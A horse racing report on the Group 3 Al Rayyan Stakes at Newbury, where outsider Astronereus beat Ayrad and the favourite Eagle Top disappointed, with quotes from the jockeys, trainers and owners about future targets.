Report: Newbury, Saturday

Al Rayyan Stakes (Registered as the Aston Park Stakes) (Group 3) 1m4f, 4yo+

ASTRONEREUS, the outsider of the five runners, produced a strong staying effort to power past Ayrad in the final stages, scoring at 14-1 with favourite Eagle Top slowly away and never involved in the race.

Trained by Amanda Perrett and ridden by Pat Dobbs, Astronereus had been off the course since finishing down the field in the Ebor last season but bounced back in fine style.

While the winner produced a resolute and determined effort to win, the performance of Eagle Top was more puzzling.

Slowly away and held up at the back in an even-paced race, Frankie Dettori moved Eagle Top up to make an effort around three furlongs from home, but his effort quickly flattened out, possibly needing the run on his first start of the season. Nevertheless, there was a distinct lack of sparkle.

Melbourne Cup contender?

Winning rider Pat Dobbs said: “He had problems the back end of last year so Amanda and her team have done a good job getting him back.

“The problem is he wants fast ground but he’s a little fragile leg-wise but they’ve sorted it out for this year. They’ve always thought a lot of him and he has a lot of options.”

Astronereus is owned by John Connolly and Odile Griffith, and Connolly said: “We were thinking he was a two-mile horse, something like the Goodwood Cup, and my heart is still set on going back to the Melbourne Cup but the ground might be a worry out there.”

A step back up in trip is likely for Astronereus next, and Perrett said: “I was hoping he’d run well, but to come and win is fantastic. He could go to Sandown for the Henry II or to France for the Prix Vicomtesse Vigier if we decide to step up in trip.”

Ascot for Eagle Top

Trainer John Gosden was pleased with the performance of Eagle Top, who is likely to head to Royal Ascot for the Hardwicke Stakes next.

“He was coming off a long layoff. He came there full of himself but blew up in the last furlong and the jockey was sensible enough to see that,” Gosden said.

“He was exuberant afterwards and I’m perfectly happy with him. I wanted to get a run into him before the Hardwicke.”
